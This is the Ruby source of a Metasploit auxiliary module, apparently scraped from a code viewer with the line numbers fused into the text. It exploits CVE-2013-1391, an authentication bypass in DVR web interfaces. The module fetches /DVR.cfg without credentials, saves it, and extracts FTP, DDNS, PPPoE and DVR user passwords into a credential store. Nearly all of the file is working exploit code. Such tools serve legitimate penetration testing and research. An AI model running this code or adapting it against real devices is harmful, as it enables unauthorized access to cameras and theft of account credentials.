Path: blob/master/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner910def initialize11super(12'Name' => 'Multiple DVR Manufacturers Configuration Disclosure',13'Description' => %q{14This module takes advantage of an authentication bypass vulnerability at the15web interface of multiple manufacturers DVR systems, which allows to retrieve the16device configuration.17},18'Author' => [19'Alejandro Ramos', # Vulnerability Discovery20'juan vazquez' # Metasploit module21],22'References' => [23[ 'CVE', '2013-1391' ],24[ 'URL', 'http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html' ]25],26'License' => MSF_LICENSE27)28end2930def get_pppoe_credentials(conf)31user = ""32password = ""33enabled = ""3435if conf =~ /PPPOE_EN=(\d)/36enabled = $137end3839return if enabled == "0"4041if conf =~ /PPPOE_USER=(.*)/42user = $143end4445if conf =~ /PPPOE_PASSWORD=(.*)/46password = $147end4849if user.empty? or password.empty?50return51end5253info = {54:host => rhost,55:username => user,56:password => password57}5859report_note({60:host => rhost,61:data => info,62:type => "dvr.pppoe.conf",63:sname => 'pppoe',64:update => :unique_data65})66end6768def get_ddns_credentials(conf)69hostname = ""70user = ""71password = ""72enabled = ""7374if conf =~ /DDNS_EN=(\d)/75enabled = $176end7778return if enabled == "0"7980if conf =~ /DDNS_HOSTNAME=(.*)/81hostname = $182end8384if conf =~ /DDNS_USER=(.*)/85user = $186end8788if conf =~ /DDNS_PASSWORD=(.*)/89password = $190end9192if hostname.empty?93return94end9596info = {97:host => hostname,98:user => user,99:password => password100}101102report_note({103:host => rhost,104:data => info,105:type => "dvr.ddns.conf",106:sname => 'ddns',107:update => :unique_data108})109end110111def get_ftp_credentials(conf)112server = ""113user = ""114password = ""115port = ""116117if conf =~ /FTP_SERVER=(.*)/118server = $1119end120121if conf =~ /FTP_USER=(.*)/122user = $1123end124125if conf =~ /FTP_PASSWORD=(.*)/126password = $1127end128129if conf =~ /FTP_PORT=(.*)/130port = $1131end132133if server.empty?134return135end136137report_cred(138ip: server,139port: port,140service_name: 'ftp',141user: user,142password: password,143proof: conf.inspect144)145end146147def report_cred(opts)148service_data = {149address: opts[:ip],150port: opts[:port],151service_name: opts[:service_name],152protocol: 'tcp',153workspace_id: myworkspace_id154}155156credential_data = {157origin_type: :service,158module_fullname: fullname,159username: opts[:user],160private_data: opts[:password],161private_type: :password162}.merge(service_data)163164login_data = {165core: create_credential(credential_data),166status: Metasploit::Model::Login::Status::UNTRIED,167proof: opts[:proof]168}.merge(service_data)169170create_credential_login(login_data)171end172173def get_dvr_credentials(conf)174conf.scan(/USER(\d+)_USERNAME/).each { |match|175user = ""176password = ""177active = ""178179user_id = match[0]180181if conf =~ /USER#{user_id}_LOGIN=(.*)/182active = $1183end184185if conf =~ /USER#{user_id}_USERNAME=(.*)/186user = $1187end188189if conf =~ /USER#{user_id}_PASSWORD=(.*)/190password = $1191end192193if active == "0"194user_active = false195else196user_active = true197end198199report_cred(200ip: rhost,201port: rport,202service_name: 'dvr',203user: user,204password: password,205proof: "user_id: #{user_id}, active: #{active}"206)207}208end209210def report_cred(opts)211service_data = {212address: opts[:ip],213port: opts[:port],214service_name: opts[:service_name],215protocol: 'tcp',216workspace_id: myworkspace_id217}218219credential_data = {220origin_type: :service,221module_fullname: fullname,222username: opts[:user],223private_data: opts[:password],224private_type: :password225}.merge(service_data)226227login_data = {228core: create_credential(credential_data),229status: Metasploit::Model::Login::Status::UNTRIED,230proof: opts[:proof]231}.merge(service_data)232233create_credential_login(login_data)234end235236def run_host(ip)237res = send_request_cgi({238'uri' => '/DVR.cfg',239'method' => 'GET'240})241242if not res or res.code != 200 or res.body.empty? or res.body !~ /CAMERA/243vprint_error("#{rhost}:#{rport} - DVR configuration not found")244return245end246247p = store_loot("dvr.configuration", "text/plain", rhost, res.body, "DVR.cfg")248vprint_good("#{rhost}:#{rport} - DVR configuration stored in #{p}")249250conf = res.body251252get_ftp_credentials(conf)253get_dvr_credentials(conf)254get_ddns_credentials(conf)255get_pppoe_credentials(conf)256257dvr_name = ""258if res.body =~ /DVR_NAME=(.*)/259dvr_name = $1260end261262report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}")263print_good("#{rhost}:#{rport} DVR #{dvr_name} found")264end265end266267268